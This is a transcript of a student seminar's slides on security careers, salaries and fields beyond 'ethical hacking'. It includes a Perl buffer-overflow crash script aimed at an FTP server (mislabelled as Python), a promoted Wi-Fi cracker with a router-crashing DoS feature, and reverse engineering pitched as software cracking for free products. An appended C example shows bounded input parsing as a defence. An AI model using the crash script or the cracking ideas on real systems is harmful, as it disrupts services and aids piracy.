Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet me at FB if u want it fb/nipun.jaswal

Published in: Education, Technology
  1. 1. Life Beyond Ethical Hacking “The Actual Information Security” By :- Nipun Jaswal (CSA , HCF Infosec Pvt. Ltd. )
  2. 2. Acknowledgements Dr. H.S Johal Ms. Himanshi
  3. 3. Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s First DLP on Web Application Penetration Testing Course Student @ LPU Tested Over 90+ Servers Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  4. 4. Let’s Go Old School , What is Ethical Hacking? Breaking Into Devices , Networks Legally. Securing Servers, Recovering Emails etc. But the Question Remains ! Where to get these jobs ?
  5. 5. Jobs And Stats
  6. 6. Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking in 2 days workshop :-P No Proper facilities of required courses
  7. 7. Salary Packages Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
  8. 8. Beyond So Called “Ethical Hacking” Web Application Penetration testing Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
  9. 9. Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
  10. 10. Jobs Beyond Ethical Hacking:- Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month
  11. 11. Benefits  of not Being a Hacker
  12. 12. Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  13. 13. How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing . Exploit Writing – Finding Vulnerabilities in software and Possibly to Exploit the Software . Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  14. 14. How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc. Projects :- Good At Coding? Show to the whole world . Forensics : Highest Paid Job in the entire list , Takes A lot , And Pays A lot
  15. 15. Why We Need More People ? Source: Indian Express
  16. 16. Why We Need More People ? Source: Times Of India
  17. 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  18. 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  19. 19. Norton India Hacked !! Source: Private
  20. 20. Norton India’s Database Hacked !! Source: Private
  21. 21. Norton India’s Database Hacked !! Source: Private
  22. 22. The Biggest Of All… Anonymous!! Source: National Post
  23. 23. Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :- • Find Bugs In Web Applications – Custom Made , Open Source Applications . • Bugs which may compromise the security , make it vulnerable , help an attacker to steal sensitive information • Now How To Perform 1 Out of 300 Tests In Web Applications Pen-Test? • Let’s See a Simple Example – SQL Injection Bypass
  24. 24. Rise Of The Web Applications
  25. 25. Fasten Your Seat Belts , Its Showtime DEMO
  26. 26. Now Beyond The Word ‘Ethical’ Exploit Writing • Potentially writing codes to exploit a vulnerability . • Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system. • Requirement : C, C++, Perl , Python , Ruby , Assembly language
  27. 27. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server

          use strict;
          use Socket;

          # Perl script: connect to the target and send 1000 'A' (0x41) bytes as one line
          my $junk  = "\x41" x 1000;
          my $host  = shift || '192.168.15.1';   # target host, first argument
          my $port  = shift || 200;              # target port, second argument
          my $proto = getprotobyname('tcp');
          my $iaddr = inet_aton($host);
          my $paddr = sockaddr_in($port, $iaddr);

          print "[+] Setting up socket\n";
          socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
          print "[+] Connecting to $host on port $port\n";
          connect(SOCKET, $paddr) or die "connect: $!";
          print "[+] Sending payload\n";
          print SOCKET $junk."\n";
          print "[+] Payload sent\n";
          close SOCKET or die "close: $!";

  28. 28. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server
  29. 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  30. 30. Now Beyond The Word ‘Ethical’ Reverse Engineering • Editing the final software to find serial keys , stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final software • Make your Life easier with free products
  31. 31. Now Beyond The Word ‘Ethical’ Wireless Penetration Testing • Involves Auditing of Network Security Over Wireless • Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background
  32. 32. INSANITY WIFI CRACKER Insanity Wi-fi Cracker • Developed By me and my Friends for minor project • Automates the cracking of various wifi securities • Performs self MITM attack • DOS Service Can Crash the Routers For Ever :-P • Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  33. 33. Wi-fi Cracking At a Click Of a Button DEMO
  34. 34. So A One Last Question , Wanna go this ?
  35. 35. Or Wanna Go This ?
  36. 36. After All It’s your Career |Handle it with care|
  37. 37. Any Questions ?
  38. 38. Contact Email : info@nipunjaswal.com , www.nipunjaswal.com , www.facebook.com/nipun.jaswal , www.hatcon.in , www.hcf.co.in , www.starthack.com , www.cyber-rog.com/h3ll , www.pentest.co.in
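
The script on slide 27 sends a single 1000-byte line to a server port. The following is an added example, not part of the original slides, showing how a server's command reader can take that input safely; it assumes the crash comes from copying an overlong command line into a fixed buffer, and `read_command`, `CMD_MAX` and the status codes are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define CMD_MAX 512   /* assumed per-line limit for this sketch */

enum cmd_status { CMD_OK = 0, CMD_INCOMPLETE = 1, CMD_TOO_LONG = 2 };

/*
 * Extract one LF- or CRLF-terminated command from a receive buffer.
 * in/in_len: bytes received so far; out/out_cap: destination buffer.
 * *consumed is set to the number of input bytes the caller should discard.
 * Never writes more than out_cap bytes, whatever the peer sends.
 */
enum cmd_status read_command(const char *in, size_t in_len,
                             char *out, size_t out_cap, size_t *consumed)
{
    const char *nl = memchr(in, '\n', in_len);
    size_t line_len;

    *consumed = 0;
    if (out_cap == 0)
        return CMD_TOO_LONG;
    out[0] = '\0';

    if (nl == NULL) {
        /* No terminator yet: keep waiting only while the line can still fit. */
        if (in_len >= out_cap || in_len > CMD_MAX) {
            *consumed = in_len;          /* drop the oversized fragment */
            return CMD_TOO_LONG;
        }
        return CMD_INCOMPLETE;
    }

    line_len = (size_t)(nl - in);
    *consumed = line_len + 1;            /* the line plus its '\n' */
    if (line_len > 0 && in[line_len - 1] == '\r')
        line_len--;                      /* strip the CR of CRLF */

    if (line_len >= out_cap || line_len > CMD_MAX)
        return CMD_TOO_LONG;             /* reject; do not truncate and execute */

    memcpy(out, in, line_len);
    out[line_len] = '\0';
    return CMD_OK;
}
```

On `CMD_TOO_LONG` the caller would answer with an error reply and log the peer address and line length, which also gives detection a signal for this kind of probe.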